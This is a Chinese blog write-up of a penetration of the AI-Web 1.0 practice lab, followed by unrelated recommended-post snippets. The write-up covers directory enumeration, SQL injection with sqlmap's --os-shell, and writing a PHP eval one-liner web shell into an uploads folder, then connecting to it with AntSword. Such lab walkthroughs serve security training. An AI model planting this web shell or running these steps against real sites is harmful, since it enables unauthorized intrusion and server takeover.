Al-Web 1.0 靶机渗透

最新推荐文章于 2024-09-15 22:31:42 发布
最新推荐文章于 2024-09-15 22:31:42 发布
阅读量352 收藏 10
点赞数 4
文章标签: python github git svn 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_82451607/article/details/141328032
版权

1.使用扫描工具 搜索靶机地址

得出靶机地址为172.16.1.88

2.使用目录扫描工具dirb(kali自带)对靶机进行扫描

发现有一个robots.txt文件

访问http://172.16.1.88/robots.txt 发现有两个目录

3.分别访问这两个目录

http://172.16.1.88/m3diNf0/ 访问第一个目录时无法访问

http://172.16.1.88/se3reTdir777/uploads/ 访问第二个目录也无法访问

4.使用dirb对/m3diNf0/目录进行扫描 

发现一个info.php文件 我们在网站上打开

在这里我们找到了网站的绝对路径

5.继续使用dirb对/se3reTdir777目录进行扫描

发现一个index.php文件 

在网站上打开发现是一个搜索页面 可能存在搜索型注入

6.使用burp抓包,在注入点后加* 然后保存为1.txt

7.使用sqlmap(kali自带)工具进行注入

使用sqlmap -r 1.txt进行注入

8.尝试--os-shell 但是需要绝对路径

因为我们之前已经找到绝对路径 可以直接尝试连接--os-shell

9.写入一句话代码

echo '<?php @eval($_POST[cmd]);?>' >> /home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/1.php

10.使用中国蚁剑连接

11.测试连接成功 

成功获取webshell权限

cc775210
关注
AI-WEB-1.0超详细多方法教程
qq_61988806的博客
10-19 3012
AI-WEB-1.0 多方法渗透
靶机渗透——Lin.Security
qq_45751902的博客
04-28 867
目录靶机描述环境配置一、信息收集二、sudo提权三、crontab定时任务四、敏感隐藏文件五、suid提权六、NFS服务低权限访问 靶机描述 在in.security,我们希望开发一个Linux虚拟机,该虚拟机在编写本文时基于最新的Ubuntu发行版(18.04 LTS),但存在许多漏洞,这些漏洞使用户无法升级扎根在盒子上。旨在帮助理解某些内置应用程序和服务(如果配置错误)可能会被攻击者滥用。 首先,您可以使用以下凭据登录主机:bob / secret 下载地址:https://in.security/do
靶机渗透练习63-doubletrouble
hirak0的博客
04-20 3286
靶机描述 靶机地址:https://www.vulnhub.com/entry/doubletrouble-1,743/ Description get flags difficulty: easy about vm: tested and exported from virtualbox. dhcp and nested vtx/amdv enabled. you can contact me by email for troubleshooting or questions. This works
靶机渗透练习69-DC1
hirak0的博客
04-21 1189
靶机描述 靶机地址:http://www.vulnhub.com/entry/dc-1,292/ Description DC-1 is a purposely built vulnerable lab for the purpose of gaining experience in the world of penetration testing. It was designed to be a challenge for beginners, but just how easy it is will
靶机渗透练习90-Grotesque:1.0.1
hirak0的博客
05-02 2903
靶机描述 靶机地址:https://www.vulnhub.com/entry/grotesque-101,658/ Description get flags difficulty: medium about vm: tested and exported from virtualbox. dhcp and nested vtx/amdv enabled. you can contact me by email for troubleshooting or questions. This works
靶机渗透练习79-Venom
hirak0的博客
04-21 2697
靶机描述 靶机地址:https://www.vulnhub.com/entry/venom-1,701/ Description This machine was created for the OSCP Preparation.This box was created with virtualbox. For any queries please contact me on twitter: @avi0813. Enumeration is the Key. 一、搭建靶机环境 攻击机Kali:
靶机渗透练习68-Ripper
hirak0的博客
04-20 519
靶机描述 靶机地址:https://www.vulnhub.com/entry/ripper-1,706/ Description This is a vulnerable linux box focused on web application testing along with showing the importance of enumeration. There are three users you needs to compromise to read the root flag. Di
靶机渗透练习80-Momentum:1
hirak0的博客
04-21 1097
靶机描述 靶机地址:https://www.vulnhub.com/entry/momentum-1,685/ Description Info: easy / medium 一、搭建靶机环境 攻击机Kali: IP地址:192.168.9.7 靶机: IP地址:192.168.9.78 注:靶机与Kali的IP地址只需要在同一局域网即可(同一个网段,即两虚拟机处于同一网络模式) 该靶机环境搭建如下 将下载好的靶机环境,导入 VritualBox,设置为 Host-Only 模式 将 VMw
靶机渗透练习61-Chronos
hirak0的博客
04-20 1854
靶机描述 靶机地址:https://www.vulnhub.com/entry/chronos-1,735/ Description Difficulty : medium This works better with VirtualBox rather than VMware 一、搭建靶机环境 攻击机Kali: IP地址:192.168.9.7 靶机: IP地址:192.168.9.58 注:靶机与Kali的IP地址只需要在同一局域网即可(同一个网段,即两虚拟机处于同一网络模式) 该靶机环境搭
DC-4-Web渗透测试靶机
01-19
【DC-4-Web渗透测试靶机】是一个专门为网络安全专业人士设计的模拟环境,主要用于学习和实践Web渗透测试技术。在Web渗透测试中,目标是识别并利用网站应用程序的安全漏洞,以便于预防或修复这些漏洞,保护真实的网络...
AI-WEB-1.0靶机教程
qq_42553928的博客
04-06 6658
文章目录靶机概况下载地址靶机描述Description靶机信息靶机界面网卡信息信息收集主机发现端口扫描命令过程端口详情网站信息网站首页目录爆破敏感目录扫描m3diNf0目录se3reTdir777目录漏洞映射SQLI渗透过程SQLI漏洞利用查看我是谁创建一个名为webshell.php的文件下载文件到靶机运行上传的文件提权 靶机概况 下载地址 https://www.vulnhub.com/entry/ai-web-1,353/ 靶机描述 Description Difficulty: Intermedi
vulnhub靶机AI-Web-1.0渗透笔记
liver100day的博客
06-10 2332
AI-Web1靶机渗透笔记 靶机环境搭建 攻击渗透机: kali IP地址:192.168.75.128 靶机:AI-Web1 IP地址未知 靶机下载地址:https://www.vulnhub.com/entry/ai-web-1,353/ 渗透过程 1.信息收集 1.1 主机发现 netdiscover 使用这条命令来确认目标靶机IP地址 确认目标靶机IP地址:192.168.75.134 1.2 端口扫描 使用端口扫描神器nmap进行扫描 nmap -T4 -sV -O -A -P- 192.1
Vulnhub靶机:AI-Web-1.0
羊柳树的博客
01-20 4243
1.信息收集 使用命令netdiscover寻找靶机IP,发现靶机IP为192.168.1.137。 使用nmap对把目标机进行端口扫描,发现只开启了80端口。 访问80端口,发现页面只有一句话,没什么可利用的信息。 使用 dirsearch -u http://192.168.1.137/对网站目录进行扫描。 2.漏洞探测与利用 尝试访问/server-status/目录,提示无权访问。访问robots.txt文件,出现两个目录。 依次访问这两个目录,提示无权访问。 那么尝试访问/se3reT
AI-Web-1.0靶场
qq_46187131的博客
03-27 1365
1.确认靶机IP 2.端口和目录扫描 3.使用SQLmap进行注入获取shell 4.使用openssl提权。
Python世界:力扣29题两数相除算法实践
来知晓的博客
09-13 377
除法运算本质是减法,从理解原理到真正实现还是有距离,建议初步理解后,不参考任何代码,完全自己复现一遍,体会更深。注意提示:目的就是提醒越界问题:-2^31/-1=2&31,超过了整数表达范围。本问题来自于力扣29题,在做完大数相乘后,顺带也看下两数相除。将两数相除,要求不使用乘法、除法和 mod 运算符。给定两个整数,被除数。
Python办公自动化案例(二):对比两个Excel数据内容并标出不同
衍生星球的博客
09-14 343
在数据处理和分析的日常工作中,我们经常需要比较两个Excel文件的差异。这可能是为了验证数据的一致性、检查数据的准确性,或者在版本控制中追踪更改。手动比较这些文件不仅耗时,而且容易出错。幸运的是,Python的openpyxl库提供了一种自动化这一过程的方法。
Tcl lnit error: Can’t find a usable init.tcl in the following directories 问题解决
最新发布
梦想闹钟
09-15 272
实际研究后发现,其实py2exe已经把打包需要的lib放在dist文件夹下了,但是打包后的程序运行后却没有去lib下找,而是去找系统自带的环境变量里找,所以找不到。这个问题出现在我用py2exe打包了一个包含tkinter的图形化界面,在当前电脑上运行无问题,在移动到新电脑上后提示报错、getcwd用于获取当前工作目录绝对路径,在设置环境的变量的时候它用的是绝对路径-所以也导致了在当前电脑上能用而移动后不能用。解决方法是在你的程序里重新设置下环境变量,而且是用相对路径的形式。
JUC从实战到源码:中断机制与API实现
qq_43843951的博客
09-12 1135
在Java中,线程中断是一种机制,用于通知线程应该停止当前正在执行的任务。中断通常用于协同线程之间的合作,以便让线程在适当的时候终止其工作,尤其是在长时间运行的任务或阻塞操作中。通过学了多线程以及synchronized的相关知识,接下来就到了学习线程中断知识。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值